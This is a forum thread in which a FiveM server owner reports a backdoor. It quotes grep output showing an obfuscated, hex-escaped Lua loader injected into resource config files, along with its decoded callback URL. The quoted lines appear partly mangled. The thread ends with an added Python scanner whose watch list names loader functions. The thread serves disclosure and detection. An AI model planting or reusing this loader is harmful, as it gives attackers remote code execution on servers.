Screenshot-basic BACKDOOR

When I run screenshot-basic it injects some code in a random file, and when decoded it's a cfxre.com URL.

./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/[smartphone]/qs-smartphone/config/config_uber.lua:local OMBrqKfTPblmDAxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrAebAdQjqpUwbeLnYshnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEVvXVJuEYUDBQDPfsFjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANbAdQjqpUwbeLnYshnS[4]() end)
Binary file ./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/qs-core/server/functions.lua matches
./server/alpine/opt/cfx-server/citizen/system_resources/monitor/resource/menu/vendor/freecam/config.lua:local OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\x64\x65”,“\x41\x66\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEJiefDzHgFzgMVvXVJjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjS[4]() end)

The URL decoded: https://cfxre.com/v2_/stage3b.php?asf=MlIrVFIvVWx6R3J0N1Vod2pGTi9jSzgxbnlYZlYrdm5PTlBJK1Nrd0NJODBiZ3hTTnpsSUhPcDJMWUVKRTdqdA==

It appears you probably got your server infected with a stolen/leaked resource that has a backdoor in it. That is not normal behavior, and I have qs-smartphone as well, and it doesn’t do those things.

Also, cfxre.com is not a FiveM domain to my knowledge, as it would be either cfx.re or fivem.net.

It's weird because when I delete screenshot-basic it doesn't spread anywhere.

And when I redownload the version from citizenfx it spreads again.

I never use leaked resources, I always buy them through the Tebex store. BTW, is it possible that one of them had a backdoor?
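
Added example, not part of the thread and not FiveM or txAdmin code: a Python scanner for the pattern in the grep output above, that is, Lua string literals written entirely as byte escapes that decode to loader-related names. The `LOADER_NAMES` list and the sample text are assumptions constructed from the strings visible in the post.

```python
import re
import sys
from pathlib import Path

# A quoted Lua string made up only of \xNN (hex) or \ddd (decimal) escapes.
ESCAPED = re.compile(r'"((?:\\x[0-9A-Fa-f]{2}|\\\d{1,3}){4,})"')
ONE_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\(\d{1,3})')
# Assumed watch list: names that are suspicious when hidden behind escapes.
LOADER_NAMES = {"load", "loadstring", "assert", "RegisterNetEvent",
                "AddEventHandler", "PerformHttpRequest"}

def decode_escapes(body):
    """Turn a run of Lua byte escapes into readable text."""
    def to_char(m):
        return chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2)))
    return ONE_ESCAPE.sub(to_char, body)

def scan_text(text):
    """Return (line_number, decoded_strings) for lines hiding loader names."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        decoded = [decode_escapes(b) for b in ESCAPED.findall(line)]
        if LOADER_NAMES.intersection(decoded):
            hits.append((number, decoded))
    return hits

def scan_tree(root):
    """Scan every .lua file under root; returns {path: hits} for flagged files."""
    report = {}
    for path in Path(root).rglob("*.lua"):
        # errors="replace" keeps going on files grep reports as "Binary file".
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample: one normal config line, one line shaped like the
# injected table from the post (variable name shortened to "t").
SAMPLE = r'''Config.Locale = "en"
local t = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G}
'''

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(scan_tree(target) if target else scan_text(SAMPLE))
```

Run it against the server's resources directory after every reinstall of a resource; a flagged file that belongs to an unrelated resource points to injection by something else running on the server rather than to that resource's own code.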